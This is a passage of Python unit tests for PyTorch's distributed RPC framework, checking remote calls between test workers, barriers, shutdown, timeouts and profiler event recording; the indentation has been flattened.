self.assertEqual(ret, dst_rank)
@dist_init
def test_add_with_id(self):
n = self.rank + 1
dst_rank = n % self.world_size
workder_info = rpc.get_worker_info(worker_name(dst_rank))
ret = rpc.rpc_sync(
workder_info, torch.add, args=(torch.ones(n, n), torch.ones(n, n))
)
self.assertEqual(ret, torch.ones(n, n) * 2)
@dist_init
def test_scalar_add(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank), torch.add, args=(torch.ones(n, n), n)
)
self.assertEqual(ret, (torch.ones(n, n) + n))
@dist_init
def test_async_add(self):
n = self.rank + 1
dst_rank = n % self.world_size
fut = rpc.rpc_async(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
@dist_init
def test_nonzero(self):
n = self.rank + 1
dst_rank = n % self.world_size
x = torch.ones(self.world_size, self.world_size)
x[self.rank][self.rank] = 0
ret = rpc.rpc_sync(worker_name(dst_rank), torch.nonzero, args=(x,))
self.assertEqual(ret, x.nonzero())
@dist_init
def test_multi_rpc(self):
self._multi_rpc(False)
@dist_init
def test_future_wait_twice(self):
dst = worker_name((self.rank + 1) % self.world_size)
futs = []
for i in range(20):
futs.append(rpc.rpc_async(dst, raise_func))
with self.assertRaisesRegex(ValueError, "Expected error"):
torch.futures.wait_all(futs)
for fut in futs:
with self.assertRaisesRegex(ValueError, "Expected error"):
fut.wait()
def _run_uneven_workload(self, f, x, num_repeat=30):
# worker0 drives and waits for worker1 and worker2
# throughout the test.
if self.rank == 0:
self.assertTrue(self.world_size >= 3)
# Phase 1: Only worker1 has workload.
dst = "worker1"
futs = []
for _ in range(num_repeat):
fut = rpc.rpc_async(dst, f, args=(x,))
futs.append(fut)
for fut in torch.futures.collect_all(futs).wait():
self.assertEqual(fut.wait(), 0)
# Phase 2: Only worker2 has workload.
# If join is not correctly implemented,
# worker2 should be closed by now.
dst = "worker2"
futs = []
for _ in range(num_repeat):
fut = rpc.rpc_async(dst, f, args=(x,))
futs.append(fut)
for val in torch.futures.wait_all(futs):
self.assertEqual(val, 0)
@dist_init(setup_rpc=False)
def test_wait_all_workers_timeout(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
og_func = rpc.api._wait_all_workers
def wait_all_workers_sleep(timeout):
try:
rpc.api._all_gather(SlowPickleClass(0.5), timeout=timeout)
except RuntimeError as ex:
raise ex
rpc.api._wait_all_workers = wait_all_workers_sleep
try:
with self.assertRaisesRegex(RuntimeError, ''):
rpc.shutdown(graceful=True, timeout=0.01)
finally:
rpc.api._wait_all_workers = og_func
dist.barrier()
def test_wait_all_workers_dense(self):
self._wait_all_workers(heavy_rpc, torch.ones(100, 100))
def test_wait_all_workers_twice_dense(self):
self._wait_all_workers_twice(heavy_rpc, torch.ones(100, 100))
@dist_init
def test_all_gather(self):
info = rpc.get_worker_info()
results = rpc.api._all_gather(info.id)
expected = {}
for info in rpc._get_current_rpc_agent().get_worker_infos():
expected[info.name] = info.id
self.assertEqual(expected, results)
@dist_init
def test_all_gather_timeout(self):
rpc._set_rpc_timeout(0.1)
if self.rank == 0:
with self.assertRaisesRegex(
RuntimeError,
"timed out in _all_gather after 0\\.10 seconds"
):
rpc.api._all_gather(SlowPickleClass(0.5))
else:
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
rpc.api._all_gather(SlowPickleClass(0.5))
def _test_barrier_helper(self, info, names, multi_threaded=False):
names = sorted(names)
leader = names[0]
rpc.rpc_sync(leader, _reset_count)
if not multi_threaded and info.name == leader:
self.assertEqual(_rpc_barrier_count, 0)
rpc.api._barrier(names)
rpc.rpc_sync(leader, _increment_count)
rpc.api._barrier(names)
if not multi_threaded and info.name == leader:
self.assertEqual(_rpc_barrier_count, len(names))
@dist_init
def test_rpc_barrier_all(self):
# Test rpc barrier when called with full list of workers
info = rpc.get_worker_info()
all_worker_info = rpc._get_current_rpc_agent().get_worker_infos()
names = [worker.name for worker in all_worker_info]
self._test_barrier_helper(info, names)
@dist_init
def test_rpc_barrier_subset(self):
# Test rpc barrier when processes are called with different subsets of the full list
info = rpc.get_worker_info()
all_worker_info = rpc._get_current_rpc_agent().get_worker_infos()
if info.id % 2:
names = [worker.name for worker in all_worker_info if worker.id % 2]
else:
names = [worker.name for worker in all_worker_info if not worker.id % 2]
self._test_barrier_helper(info, names)
@dist_init
def test_rpc_barrier_partial_subset(self):
# Test rpc barrier when some processes are not involved in the barrier
info = rpc.get_worker_info()
all_worker_info = rpc._get_current_rpc_agent().get_worker_infos()
if info.id % 2:
names = [worker.name for worker in all_worker_info if worker.id % 2]
else:
names = [f"worker{info.id}"]
self._test_barrier_helper(info, names)
@dist_init
def test_rpc_barrier_multithreaded(self):
# This tests validates the implementation of barrier when multiple threads call into it
# We only need to check that it does not hang in this case
info = rpc.get_worker_info()
all_worker_info = rpc._get_current_rpc_agent().get_worker_infos()
names = [worker.name for worker in all_worker_info]
threads = []
for _ in range(3):
th = threading.Thread(target=self._test_barrier_helper, args=(info, names, True))
threads.append(th)
th.start()
for th in threads:
th.join()
@dist_init
def test_graceful_shutdown_with_uneven_workload(self):
"""Test graceful termination."""
self._run_uneven_workload(heavy_rpc, torch.ones(100, 100))
@dist_init(setup_rpc=False)
def test_shutdown_followed_by_rpc(self):
# Initialize RPC.
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
self.assertEqual(ret, torch.ones(n, n) * 2)
rpc.shutdown()
with self.assertRaisesRegex(RuntimeError, "^RPC has not been initialized"):
rpc.rpc_sync(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
@dist_init
def test_expected_src(self):
dst_rank = (self.rank + 1) % self.world_size
expected_src_rank = (self.rank - 1) % self.world_size
ret = rpc.rpc_sync(worker_name(dst_rank), set_value, args=(self.rank,))
value = VALUE_FUTURE.result()
self.assertEqual(value, expected_src_rank)
@dist_init
def test_py_built_in(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(worker_name(dst_rank), min, args=(n, n + 1, n + 2))
self.assertEqual(ret, min(n, n + 1, n + 2))
@dist_init
def test_py_user_defined(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
my_function,
kwargs={"a": n, "b": n + 1, "c": n + 2},
)
self.assertEqual(ret, my_function(n, n + 1, n + 2))
def test_build_rpc_profiling_key(self):
# Tests that the name that shows up as an Event in profiling RPCs has all
# the necessary information.
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
rpc_profiling_key = _build_rpc_profiling_key(
exec_mode, "foo", "worker0", "worker1"
)
self.assertIn(exec_mode.value, rpc_profiling_key)
self.assertIn("foo", rpc_profiling_key)
self.assertIn("worker0", rpc_profiling_key)
self.assertIn("worker1", rpc_profiling_key)
def check_profiling_info(self, self_worker_name, dst_worker_name, func, rpc_event, rpc_exec_mode):
self.assertTrue(self_worker_name in rpc_event.name)
self.assertTrue(dst_worker_name in rpc_event.name)
if isinstance(func, torch.jit.ScriptFunction):
self.assertTrue(torch._jit_internal._qualified_name(func) in rpc_event.name)
else:
self.assertTrue(func.__name__ in rpc_event.name)
self.assertTrue(rpc_exec_mode.value in rpc_event.name)
self.assertEqual(rpc_event.count, 1)
@dist_init
def test_profiler_rpc_record_shapes(self):
if self.rank != 1:
return
dst = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst)
t1, t2 = torch.ones(100), torch.ones(100)
with _profile(record_shapes=True) as prof:
rpc.rpc_sync(dst_worker, torch.add, args=(t1, t2))
function_events = prof.function_events
remote_events = [event for event in function_events if event.is_remote]
remote_add_event = [
event for event in remote_events if "aten::add" in event.name
][0]
remote_add_input_shapes = remote_add_event.input_shapes
# Run profiler on equivalent local op and validate shapes are the same.
with _profile(record_shapes=True) as prof:
torch.add(t1, t2)
local_function_events = prof.function_events
local_add_event = [
event for event in local_function_events if "aten::add" in event.name
][0]
local_add_input_shapes = local_add_event.input_shapes
self.assertEqual(remote_add_input_shapes, local_add_input_shapes)
@dist_init
def test_profiler_rpc_memory(self):
if self.rank != 1:
return
dst = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst)
with _profile(profile_memory=True) as p:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
res = fut.wait()
function_events = p.function_events
event_cpu_mem_usages = set(event.cpu_memory_usage for event in function_events)
# if cpu_memory_usage was not propagated over the wire, this set would
# only contain 0 (indicates no memory being profiled)
self.assertNotEqual({0}, event_cpu_mem_usages)
# No memory profiled if profile_memory=False
with _profile(profile_memory=False) as p:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
res = fut.wait()
function_events = p.function_events
event_cpu_mem_usages = set(event.cpu_memory_usage for event in function_events)
self.assertEqual({0}, event_cpu_mem_usages)
@dist_init
def test_profiler_export_trace(self):
if self.rank != 1:
return
dst = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst)
with _profile() as p:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
res = fut.wait()
events = p.function_events
with TemporaryFileName() as fname:
path = fname
p.export_chrome_trace(path)
with open(path) as f:
trace = json.load(f)
event_names = [event['name'] for event in trace]
for expected_event_name in EXPECTED_REMOTE_EVENTS + [RPCExecMode.ASYNC.value]:
event_exists = any([expected_event_name in event_name for event_name in event_names])
self.assertTrue(event_exists)
@dist_init
def test_profiler_rpc_key_names(self):
# tests that remote events are properly prefixed with the RPC profiling key.
if self.rank != 1:
return
# Spawn multiple threads that send RPCs to ensure keys are correctly
# prefixied when there are multiple RPCs being created/in flight at the
# same time.
dst_ranks = [rank for rank in range(0, self.world_size) if rank != self.rank]
def rpc_with_profiling(dst_worker):
with _profile() as prof:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
fut.wait()
events = prof.function_events
remote_event_names = {
event.name: event for event in events if event.is_remote
}
rpc_profiling_key = _build_rpc_profiling_key(
RPCExecMode.ASYNC,
udf_with_torch_ops.__qualname__,
worker_name(self.rank),
dst_worker,
)
remote_event_name_set = set(EXPECTED_REMOTE_EVENTS)
for name, event in remote_event_names.items():
# Ensure that we have the expected key as part of the remote
# event.
self.assertTrue(name.startswith(rpc_profiling_key))
self.assertTrue(event.is_remote)
self.assertTrue(event.node_id == rpc.get_worker_info(dst_worker).id)
# Ensure that the remote event name also contains the operator.
operator_name_substr = name[len(rpc_profiling_key) :]
# Note: we don't assert that every remote event needs to be
# in the above set, the set is just a representative set of
# what we expect to see. The profiler can change and add more
# events, but we should always expect to see this representative
# set.
matching_event = {
remote_event_name
for remote_event_name in remote_event_name_set
if remote_event_name in operator_name_substr
}
remote_event_name_set -= matching_event
# The set should be empty, otherwise its contained elements did
# not show up in the remote profiler output.
self.assertTrue(
remote_event_name_set == set(),
f"Expected {remote_event_name_set} to be included in remote profiler output.",
)
for dst in dst_ranks:
dst_worker = worker_name(dst)
num_parallel_rpcs = 2
with concurrent.futures.ThreadPoolExecutor(
max_workers=num_parallel_rpcs
) as executor:
futs = [
executor.submit(rpc_with_profiling, dst_worker)
for _ in range(num_parallel_rpcs)
]
# Wait for workers to finish test
for fut in futs:
fut.result()
def _run_test_profiler_remote_events_profiled(self):
# Tests that we can successfully invoke the profiler on a remote node,
# and collect the remote events back in the local profiler.
if self.rank != 1:
return
dst_ranks = [rank for rank in range(0, self.world_size) if rank != self.rank]
for dst in dst_ranks:
dst_worker = worker_name(dst)
with _profile() as prof:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
ret = fut.wait()
events = prof.function_events
rpc_event = get_function_event(events, RPCExecMode.ASYNC.value)
self.check_profiling_info(
worker_name(self.rank),
dst_worker,
udf_with_torch_ops,
rpc_event,
RPCExecMode.ASYNC,
)
remote_events = {event.name: event for event in events if event.is_remote}
rpc_profiling_key = _build_rpc_profiling_key(
RPCExecMode.ASYNC,
udf_with_torch_ops.__qualname__,
worker_name(self.rank),
worker_name(dst),
)
for expected_remote_event_name in EXPECTED_REMOTE_EVENTS:
expected_key = rpc_profiling_key + REMOTE_OP_STR + expected_remote_event_name
self.assertTrue(expected_key in remote_events)
remote_event = remote_events[expected_key]
# Remote event should have a node ID corresponding to the worker
# it ran on.
self.assertEqual(remote_event.node_id, dst)
# Validate order remote events show up in profiling output.
def convert_remote_to_local(event_name):
remote_op_key = rpc_profiling_key + REMOTE_OP_STR
return event_name[
event_name.find(remote_op_key)
+ len(remote_op_key) :
]
remote_events_list = [
convert_remote_to_local(event.name)
for event in events
if convert_remote_to_local(event.name) in EXPECTED_REMOTE_EVENTS
]
self.assertEqual(
set(remote_events_list),
set(EXPECTED_REMOTE_EVENTS),
f"Mismatch between profiled events: {set(remote_events_list)} and expected events: {set(EXPECTED_REMOTE_EVENTS)}",
)
@dist_init
def test_profiler_remote_events_profiled(self):
self._run_test_profiler_remote_events_profiled()
@dist_init
def test_profiler_remote_events_profiled_single_threaded(self):
self._run_test_profiler_remote_events_profiled()
def run_profiling_workload(self, dst):
fut = rpc.rpc_async(
worker_name(dst),
torch.mul,
args=(
torch.tensor(1.0, requires_grad=True),
torch.tensor(1.0, requires_grad=True),
),
)
fut.wait()
def _run_rpc_profiling_async_function(self, device="cpu"):
if self.rank != 1:
return
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
x = torch.ones(2)
y = torch.ones(2)
with _profile() as prof:
ret = rpc.rpc_async(
dst1, slow_async_add, args=(dst2, x, y, device), timeout=20
)
out = ret.wait()
function_events = prof.function_events
# slow_async_add resulted in an RPC from dst1 -> dst2, so this should be
# recorded.
key_prefix = _build_rpc_profiling_key(
RPCExecMode.ASYNC, slow_async_add.__qualname__, worker_name(self.rank), dst1
)
nested_rpc_key_prefix = _build_rpc_profiling_key(
RPCExecMode.ASYNC, slow_add.__qualname__, dst1, dst2
)
expected_key = key_prefix + REMOTE_OP_STR + nested_rpc_key_prefix
remote_events = [event for event in function_events if event.is_remote]
rpc_remote_event = [
event for event in remote_events if event.name == expected_key
]
self.assertEqual(1, len(rpc_remote_event))
rpc_remote_event = rpc_remote_event[0]
self.assertEqual(rpc_remote_event.node_id, (self.rank + 1) % self.world_size)
# slow_async_add's RPC does an add on dst2, which should be reflected as well.
remote_add_key = (
expected_key + REMOTE_OP_STR + torch.jit._builtins._find_builtin(torch.add)
)
remote_add_event = [
event for event in remote_events if event.name == remote_add_key
]
self.assertEqual(1, len(remote_add_event))
remote_add_event = remote_add_event[0]
# Validate that node_id is dst2.
self.assertEqual(remote_add_event.node_id, (self.rank + 2) % self.world_size)
@dist_init
def test_rpc_profiling_async_function(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
self._run_rpc_profiling_async_function()
if torch.cuda.is_available():
dist.barrier()
self._run_rpc_profiling_async_function(device="cuda:0")
@dist_init
def test_rpc_profiling_async_function_single_threaded(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
self._run_rpc_profiling_async_function()
if torch.cuda.is_available():
dist.barrier()
self._run_rpc_profiling_async_function(device="cuda:0")
@dist_init
def test_rpc_profiling_remote_record_function(self):
# test that functions run over RPC with record_function show the expected
# profiled block.
if self.rank != 1:
return
dst_ranks = [i for i in range(self.world_size) if i != self.rank]
for dst_rank in dst_ranks:
dst_worker = worker_name(dst_rank)
with _profile() as prof:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=(-1, True))
fut.wait()
function_events = prof.function_events
record_function_remote_event = [
evt for evt in function_events if "##forward##" in evt.name
]
self.assertEqual(1, len(record_function_remote_event))
record_function_remote_event = record_function_remote_event[0]
self.assertEqual(record_function_remote_event.node_id, dst_rank)
# cpu_children only returns direct children, so here we get all
# children recursively.
def get_cpu_children(event):
if not event.cpu_children:
return []
cpu_children = event.cpu_children
for e in event.cpu_children:
cpu_children.extend(get_cpu_children(e))
return cpu_children
remote_children = get_cpu_children(record_function_remote_event)
# Get local children and verify parity.
with _profile() as prof:
udf_with_torch_ops(-1, True)
local_function_events = prof.function_events
local_record_function_event = [
evt for evt in local_function_events if "##forward##" in evt.name
][0]
local_children = get_cpu_children(local_record_function_event)
local_children_names = [
evt.name for evt in local_children
]
REMOTE_OP_STR = "#remote_op: "
def convert_remote_to_local(event_name):
remote_op_key = REMOTE_OP_STR
return event_name[
event_name.find(remote_op_key) + len(remote_op_key) :
]
for evt in remote_children:
local_name = convert_remote_to_local(evt.name)
self.assertTrue(local_name in local_children_names)
def validate_profiling_workload(self, dst, prof):
def convert_remote_to_local(event_name):
return event_name[event_name.find(REMOTE_OP_STR) + len(REMOTE_OP_STR) :]
events = prof.function_events
remote_events = {
convert_remote_to_local(event.name): event
for event in events
if event.is_remote
}
self.assertTrue("aten::mul" in remote_events)
remote_mul_event = remote_events["aten::mul"]
self.assertEqual(remote_mul_event.node_id, dst)
self.check_profiling_info(
worker_name(self.rank),
worker_name(dst),
torch.mul,
remote_mul_event,
RPCExecMode.ASYNC,
)
def _run_test_profiler_with_autograd_context(self):
dst = (self.rank + 1) % self.world_size
if self.rank == 1:
# Cases where we can double wrap messages with profiling information and autograd info.
with dist_autograd.context() as context_id:
with _profile() as prof:
self.run_profiling_workload(dst)
self.validate_profiling_workload(dst, prof)
# Ensure that flipped order of ctx managers results in events being
# recorded as expected.
with _profile() as prof:
with dist_autograd.context() as context_id:
self.run_profiling_workload(dst)
self.validate_profiling_workload(dst, prof)
@dist_init
def test_profiler_with_autograd_context_single_threaded(self):
self._run_test_profiler_with_autograd_context()
@dist_init
def test_profiler_with_autograd_context(self):
self._run_test_profiler_with_autograd_context()
def _profiler_test_with_rpc(self, rpc_exec_mode, func, args, use_record_function=False, dst=None):
dst = dst if dst is not None else (self.rank + 1) % self.world_size
# only run profiler on rank 1.
if self.rank == 1:
with _profile() as prof:
record_function_ctx_mgr = (
contextlib.suppress()
if not use_record_function
else torch.autograd.profiler.record_function(
"foo"
)
)
with record_function_ctx_mgr as rf:
if rpc_exec_mode == RPCExecMode.SYNC:
rpc.rpc_sync(worker_name(dst), func, args=args)
elif rpc_exec_mode == RPCExecMode.ASYNC:
fut = rpc.rpc_async(worker_name(dst), func, args=args)
fut.wait()
else:
self.assertTrue(rpc_exec_mode == RPCExecMode.REMOTE)
rref = rpc.remote(worker_name(dst), func, args=args)
rref.to_here()
# To avoid flakiness, wait for the RRef to be profiled. This
# means that we received the acknowledgement of successful
# creation on the owner and ran the callbacks responsible
# for recording the profiling event.
rref._get_profiling_future().wait()
events = prof.function_events
rpc_event = get_function_event(events, rpc_exec_mode.value)
# verify Node ID for this rpc event.
self.assertEqual(rpc_event.node_id, self.rank)
# Ensure recording of remote events.
remote_events = {event for event in events if event.node_id == dst} - {rpc_event}
self.assertGreaterEqual(len(remote_events), 1)
for remote_event in remote_events:
self.assertEqual(remote_event.node_id, dst)
if use_record_function:
scope_event = get_function_event(events, "foo")
# Since RPC call is within the scope, its CPU interval should be
# contained within foo's interval.
self.assertLessEqual(scope_event.time_range.start, rpc_event.time_range.start)
self.assertGreaterEqual(scope_event.time_range.end, rpc_event.time_range.end)
# the sender, dest worker, function run, and type of RPC should all
# be recorded.
self_worker_name = worker_name(self.rank)
dst_worker_name = worker_name(dst)
self.check_profiling_info(self_worker_name, dst_worker_name, func, rpc_event, rpc_exec_mode)
if use_record_function:
# verify order by ensuring that the outer context comes
# before the rpc event.
foo_event_ix = next(i for i, event in enumerate(events) if "foo" in event.name)
rpc_event_idx = next(i for i, event in enumerate(events) if rpc_exec_mode.value in event.name)
self.assertLess(foo_event_ix, rpc_event_idx)
def _run_test_profiler_with_sync_rpc_udf(self):
self._profiler_test_with_rpc(RPCExecMode.SYNC, my_sleep_func, args=(1,))
self._profiler_test_with_rpc(RPCExecMode.SYNC, my_sleep_func, args=(1,),
use_record_function=True)
@dist_init
def test_profiler_with_sync_rpc_udf(self):
self._run_test_profiler_with_sync_rpc_udf()
@dist_init
def test_profiler_with_sync_rpc_udf_single_threaded(self):
self._run_test_profiler_with_sync_rpc_udf()
def _run_test_profiler_with_sync_rpc_builtin(self):
self._profiler_test_with_rpc(
RPCExecMode.SYNC, torch.mul, args=(torch.ones(1), torch.ones(1))
)
self._profiler_test_with_rpc(
RPCExecMode.SYNC, torch.mul, args=(torch.ones(1), torch.ones(1)),
use_record_function=True
)
@dist_init
def test_profiler_with_sync_rpc_builtin(self):
self._run_test_profiler_with_sync_rpc_builtin()
@dist_init
def test_profiler_with_sync_rpc_builtin_single_threaded(self):
self._run_test_profiler_with_sync_rpc_builtin()
def _run_test_profiler_with_async_rpc_udf(self):
self._profiler_test_with_rpc(RPCExecMode.ASYNC, my_sleep_func, args=(1,))
self._profiler_test_with_rpc(RPCExecMode.ASYNC, my_sleep_func, args=(1,),
use_record_function=True)
@dist_init
def test_profiler_with_async_rpc_udf(self):
self._run_test_profiler_with_async_rpc_udf()
@dist_init
def test_profiler_with_async_rpc_udf_single_threaded(self):
self._run_test_profiler_with_async_rpc_udf()
def _run_test_profiler_with_async_rpc_builtin(self):
self._profiler_test_with_rpc(
RPCExecMode.ASYNC, torch.mul, args=(torch.ones(1), torch.ones(1))
)
self._profiler_test_with_rpc(
RPCExecMode.ASYNC, torch.mul, args=(torch.ones(1), torch.ones(1)),
use_record_function=True
)
@dist_init
def test_profiler_with_async_rpc_builtin(self):
self._run_test_profiler_with_async_rpc_builtin()
@dist_init
def test_profiler_with_async_rpc_builtin_single_threaded(self):
self._run_test_profiler_with_async_rpc_builtin()
def _run_test_profiler_with_remote_udf(self):
self._profiler_test_with_rpc(RPCExecMode.REMOTE, my_sleep_func, args=(1,))
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, my_sleep_func, args=(1,), use_record_function=True
)
# test remote to self
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, my_sleep_func, args=(1,), dst=self.rank
)
@dist_init
def test_profiler_with_remote_udf(self):
self._run_test_profiler_with_remote_udf()
@dist_init
def test_profiler_with_remote_udf_single_threaded(self):
self._run_test_profiler_with_remote_udf()
def _run_test_profiler_with_remote_builtin(self):
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, torch.mul, args=(torch.ones(1), torch.ones(1))
)
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, torch.mul, args=(torch.ones(1), torch.ones(1)),
use_record_function=True
)
# test remote to self
self._profiler_test_with_rpc(
RPCExecMode.REMOTE,
torch.mul,
args=(torch.ones(1), torch.ones(1)),
dst=self.rank,
)
@dist_init
def test_profiler_with_remote_builtin(self):
self._run_test_profiler_with_remote_builtin()
@dist_init
def test_profiler_with_remote_builtin_single_threaded(self):
self._run_test_profiler_with_remote_builtin()
def _run_test_profiler_with_script_async_rpc(self):
self._profiler_test_with_rpc(
RPCExecMode.ASYNC, my_script_func, args=(torch.tensor(1),)
)
self._profiler_test_with_rpc(
RPCExecMode.ASYNC,
my_script_func,
args=(torch.tensor(1),),
use_record_function=True,
)
@dist_init
def test_profiler_with_script_async_rpc(self):
self._run_test_profiler_with_script_async_rpc()
@dist_init
def test_profiler_with_script_async_rpc_single_threaded(self):
self._run_test_profiler_with_script_async_rpc()
def _run_test_profiler_with_script_sync_rpc(self):
self._profiler_test_with_rpc(
RPCExecMode.SYNC, my_script_func, args=(torch.tensor(1),)
)
self._profiler_test_with_rpc(
RPCExecMode.SYNC,
my_script_func,
args=(torch.tensor(1),),
use_record_function=True,
)
@dist_init
def test_profiler_with_script_sync_rpc(self):
self._run_test_profiler_with_script_sync_rpc()
@dist_init
def test_profiler_with_script_sync_rpc_single_threaded(self):
self._run_test_profiler_with_script_sync_rpc()
def _run_test_profiler_with_script_remote_rpc(self):
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, my_script_func, args=(torch.tensor(1),)
)
self._profiler_test_with_rpc(
RPCExecMode.REMOTE,
my_script_func,
args=(torch.tensor(1),),
use_record_function=True,
)
# test remote to self
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, my_script_func, args=(torch.tensor(1),), dst=self.rank
)
@dist_init
def test_profiler_with_script_remote_rpc(self):
self._run_test_profiler_with_script_remote_rpc()
@dist_init
def test_profiler_with_script_remote_rpc_single_threaded(self):
self._run_test_profiler_with_script_remote_rpc()
def _assert_top_level_events(self, process_global_events, expected_top_level_event_names):
top_level_event_names = []
for thread_local_events in process_global_events:
# Get top-level events from all events happened on a thread.
last_end_time = 0
for event in thread_local_events:
event_name = event.name
time_range = event.time_range
if time_range.start > last_end_time:
top_level_event_names.append(event_name)
last_end_time = time_range.end
top_level_event_names = sorted(top_level_event_names)
expected_top_level_event_names = sorted(expected_top_level_event_names)
self.assertEqual(
top_level_event_names,
expected_top_level_event_names,
f"Expected events {expected_top_level_event_names}, but got {top_level_event_names}",
)
@dist_init
def test_server_process_global_profiler(self):
if self.rank != 0:
return
dst_rank = (self.rank + 1) % self.world_size
dst_worker_name = worker_name(dst_rank)
x = torch.tensor(1)
y = torch.tensor(2)
outer_profile_rref = rpc.remote(dst_worker_name, rpc._server_process_global_profile)
outer_profile_rref.rpc_sync().__enter__()
rpc.rpc_sync(dst_worker_name, torch.add, (x, y))
inner_profile_rref = rpc.remote(dst_worker_name, rpc._server_process_global_profile)
inner_profile_rref.rpc_sync().__enter__()
rpc.rpc_sync(dst_worker_name, torch.sub, (x, y))
inner_profile_rref.rpc_sync().__exit__(None, None, None)
outer_profile_rref.rpc_sync().__exit__(None, None, None)
inner_events = rpc.rpc_sync(dst_worker_name, get_events_from_profile, (inner_profile_rref,))
expected_inner_events = ['aten::sub']
expected_outer_events = expected_inner_events + ['aten::add']
self._assert_top_level_events(inner_events, expected_inner_events)
outer_events = rpc.rpc_sync(dst_worker_name, get_events_from_profile, (outer_profile_rref,))
self._assert_top_level_events(outer_events, expected_outer_events)
inner_profile_rref.rpc_sync().key_averages()
outer_profile_rref.rpc_sync().key_averages()
@dist_init
def test_async_record_function_double_end_callbacks(self):
num_sleep_seconds = 1
if self.rank == 1:
# Validate that calling the function twice results in an error.
with _profile() as pf:
with torch.autograd.profiler.record_function("foo") as rf:
fut = rpc.rpc_async(
worker_name(0), my_sleep_func, args=(num_sleep_seconds,)
)
rf._call_end_callbacks_on_future(fut)
with self.assertRaisesRegex(
RuntimeError, "can only be called once."
):
rf._call_end_callbacks_on_future(fut)
fut.wait()
@dist_init
def test_async_record_function_cbs_jit_call(self):
if self.rank == 1:
with _profile() as pf:
key = _build_rpc_profiling_key(
RPCExecMode.ASYNC,
torch._jit_internal._qualified_name(my_script_func),
"worker1",
"worker0",
)
with torch.autograd.profiler.record_function(key) as rf:
fut = rpc.rpc_async(
worker_name(0), my_script_func, args=(torch.tensor(1),)
)
# Intentionally calling record_function internals
fut = torch.ops.profiler._call_end_callbacks_on_jit_fut(rf.handle, fut)
result = fut.wait()
# Validate that the profiling future returns the same value as the RPC
# future.
expected = torch.add(torch.tensor(1), torch.tensor(1))
self.assertEqual(result, expected)
events = pf.function_events
rpc_event = get_function_event(
events, torch._jit_internal._qualified_name(my_script_func)
)
self.assertTrue(torch._jit_internal._qualified_name(my_script_func) in rpc_event.name)
@dist_init
def test_py_class_constructor(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(worker_name(dst_rank), MyClass, args=(n,))
self.assertEqual(ret.a, n)
@dist_init
def test_py_class_instance_method(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank), MyClass(2).my_instance_method, args=(n,)
)
self.assertEqual(ret, MyClass(2).my_instance_method(n))
@dist_init
def test_py_class_method(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank), MyClass.my_class_method, args=(n, n + 1)
)
self.assertEqual(ret, MyClass.my_class_method(n, n + 1))
@dist_init
def test_py_class_static_method(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank), MyClass.my_static_method, args=(n + 10,)
)
self.assertEqual(ret, MyClass.my_static_method(n + 10))
@dist_init
def test_py_multi_async_call(self):
n = self.rank + 1
dst_rank = n % self.world_size
dst_worker_info = rpc.get_worker_info(worker_name(dst_rank))
fut1 = rpc.rpc_async(dst_worker_info, MyClass.my_static_method, args=(n + 10,))
fut2 = rpc.rpc_async(dst_worker_info, min, args=(n, n + 1, n + 2))
self.assertEqual(fut1.wait(), MyClass.my_static_method(n + 10))
self.assertEqual(fut2.wait(), min(n, n + 1, n + 2))
@dist_init
def test_py_no_return_result(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(worker_name(dst_rank), no_result)
self.assertEqual(ret, no_result())
@dist_init
def test_py_tensors(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
my_tensor_function,
args=(torch.ones(n, n), torch.ones(n, n)),
)
self.assertEqual(ret, my_tensor_function(torch.ones(n, n), torch.ones(n, n)))
@dist_init
def test_py_tensors_multi_async_call(self):
futs = []
n = self.rank + 1
dst_rank = n % self.world_size
for i in range(100):
fut = rpc.rpc_async(
worker_name(dst_rank),
my_tensor_function,
args=(torch.ones(i, i), torch.ones(i, i)),
)
futs.append(fut)
j = 0
for val in torch.futures.wait_all(futs):
self.assertEqual(
